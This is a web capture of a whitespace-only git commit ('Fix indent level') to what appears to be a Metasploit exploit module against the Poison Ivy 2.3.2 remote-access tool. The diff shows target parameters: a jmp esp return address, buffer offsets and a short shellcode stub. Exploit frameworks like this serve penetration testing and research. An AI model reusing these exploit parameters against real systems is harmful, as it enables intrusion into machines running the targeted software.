Fix indent level
parent
24c57b61a8
commit
70c718a5ed
|
@ -57,16 +57,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Poison Ivy 2.3.2 / Windows XP SP3 / Windows 7 SP1',
|
||||
{
|
||||
'Ret' => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
|
||||
'RWAddress' => 0x00401000,
|
||||
'Offset' => 0x806D,
|
||||
'PayloadOffset' => 0x75,
|
||||
'jmpPayload' => "\x81\xec\x00\x80\x00\x00\xff\xe4" # sub esp,0x8000 # jmp esp
|
||||
}
|
||||
],
|
||||
[ 'Poison Ivy 2.3.2 - Bruteforce / Windows XP SP3 / Windows 7 SP1',
|
||||
[
|
||||
'Poison Ivy 2.3.2 / Windows XP SP3 / Windows 7 SP1',
|
||||
{
|
||||
'Ret' => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
|
||||
'RWAddress' => 0x00401000,
|
||||
'Offset' => 0x806D,
|
||||
'PayloadOffset' => 0x75,
|
||||
'jmpPayload' => "\x81\xec\x00\x80\x00\x00\xff\xe4" # sub esp,0x8000 # jmp esp
|
||||
}
|
||||
],
|
||||
[
|
||||
'Poison Ivy 2.3.2 - Bruteforce / Windows XP SP3 / Windows 7 SP1',
|
||||
{
|
||||
'Ret' => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
|
||||
'RWAddress' => 0x00401000,
|
||||
|
@ -81,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Delay' => 2
|
||||
}
|
||||
}
|
||||
],
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
|
Loading…
Reference in New Issue